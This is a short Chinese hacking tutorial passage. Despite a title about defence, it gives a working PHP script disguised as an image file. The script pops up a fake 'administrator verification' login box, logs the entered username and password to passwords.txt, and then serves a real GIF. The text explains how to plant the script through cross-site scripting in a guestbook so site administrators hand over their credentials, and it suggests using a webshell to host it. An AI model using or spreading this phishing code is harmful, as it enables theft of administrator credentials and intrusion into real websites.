从攻击者角度来阐述如何防御黑客攻击

$image = imagecreatefromgif('mellow.gif');

if(!$_COOKIE['LOGON'])

{

$login = $_SERVER['PHP_AUTH_USER'];

$pass = $_SERVER['PHP_AUTH_PW'];

if(strlen($pass) <= 4 || !$login)

{

Header('HTTP/1.1 401 Unauthorized');

Header('WWW-Authenticate: Basic realm="管理员验证 - login"');

}

elseif($login)

{

setcookie('LOGON',md5($pass));

$f = fopen('passwords.txt', 'ab');

fwrite($f, $login." ||| ".$pass." ");

fclose($f);

}

}

imagegif($image);

imagedestroy($image);

?>

新建个文档，把代码保存在文件内，后缀名改成图片格式。然后去网上找个小型的图片文件。将这两个图片放在同一个目录下就OK了。

$image = imagecreatefromgif('mellow.gif');

这里就是调用的正常图片文件!然后我们在跨站那里输入，如果成功的话，就会生成个passwords.txt文件，文件内记录着管理员输入的帐号和密码!废话不少说了，现在我们来演示下吧，可能有的人说?管理一般都在后台进行留言管理的。很少跑到前台的，其实后台也要调用那文件。只要管理员进了后台，进行留言管理就能利用的。另外不要搞错哦，那代码是PHP的，要在PHP环境下才能正常解析!如果大家没有PHP的空间，去找个支持PHP的Webshell也行。大家看到没，出现了登陆框，不精明的网管会以为是程序的验证。那么，他就会输入帐号和密码再次进行验证。刷新下，密码框就不会出现。除非你删除你机子上的cookie才行。这样迷域性更大了，如图9